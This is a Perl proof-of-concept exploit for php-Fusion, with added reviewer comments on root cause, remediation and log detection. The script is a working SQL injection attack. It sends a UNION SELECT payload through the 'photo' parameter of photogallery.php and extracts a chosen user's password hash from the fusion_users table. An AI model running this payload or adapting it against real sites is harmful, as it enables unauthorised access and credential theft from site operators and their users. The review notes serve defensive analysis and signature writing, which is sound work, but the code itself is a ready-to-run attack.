#!/usr/bin/perl
# php-Fusion exploit (work only with magic_quotes=Off)!
# by Critical Security --> www.critical.lt
# Greets: Critical security team (mircia, ld, zauliuz ) and all our fans :*
# coded by JahMan --> tomas at critical.lt
#
# Reviewer summary
# ----------------
# Proof-of-concept for a SQL injection through the `photo` query parameter of
# photogallery.php. It sends one GET request over plain HTTP and prints the
# first 32-character lowercase hex string found in the response, labelling it
# the password hash of the chosen user id.
#
# Root cause (inferred from the payload, the server code is not shown here):
# `photo` appears to reach a quoted SQL string literal unescaped. The header
# note about magic_quotes fits that reading: with magic_quotes_gpc on, PHP
# backslash-escapes the quote and the literal is never closed.
#
# Remediation belongs in the application, not in PHP settings:
#   * validate `photo` as an integer, or bind it as a query parameter;
#   * do not rely on magic_quotes -- the setting was removed in PHP 5.4;
#   * treat stored hashes as disclosed if this request pattern shows up in
#     logs, and force password resets.
#
# Detection: access-log entries for photogallery.php whose `photo` value
# contains `%27`, `union`, `select` or `fusion_users`. The request also uses
# bare LF line endings instead of CRLF, which some proxies and WAFs flag.
use IO::Socket;

# Positional arguments: target host, application path, numeric user id.
# They are read before the argument-count check below and none is validated.
$host = $ARGV[0];
$dir = $ARGV[1];
$userid = $ARGV[2];
if (@ARGV < 3) { print "-- Usage: pfu.pl [host] [path] [user id] --\n"; exit(); }

# Build the request path. Payload anatomy, for signature writing:
#   %27                closes the string literal (URL-encoded single quote)
#   union select ...   nine columns, user_password in the fifth position
#   from fusion_users  the application's user table
#   /*                 opens a SQL comment; presumably discards the rest of
#                      the original query -- NOTE(review): confirm against
#                      the server-side statement
$full = $dir;
$full .= "photogallery.php?photo=1247744%27%20union%20select%20null,null,null,null,user_password,null,null,null,null%20from%20fusion_users%20where%20user_id=";
$full .= $userid;
$full .= "/*";

# TCP connection to port 80 with a 5-second timeout. `or` binds looser than
# `=`, so die() fires when new() fails and the if-branch is always taken
# whenever execution gets this far.
if ($connect = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp",Timeout => "5" ) or die "--Can't connect!--\n") { print "-- Connected! --\n"; }

# Minimal HTTP/1.1 request: request line, Host, Connection: close.
print $connect "GET $full HTTP/1.1\n";
print $connect "Host: $host\n";
print $connect "Connection: close\n\n";
print "-- Sent! --\n";

# Scan the response line by line, headers included, and stop at the first run
# of 32 lowercase hex characters (the length of an MD5 digest).
while($recv=<$connect>) { if ($recv=~m/([a-f0-9]{32})/ ) { print "-- Uhya!Kids!;) --\n-- User id: $userid --\n-- Pass hash:$1 --\n"; exit(); } }

# Reached only when no response line matched the pattern.
print "-- Something wrong:( --\n";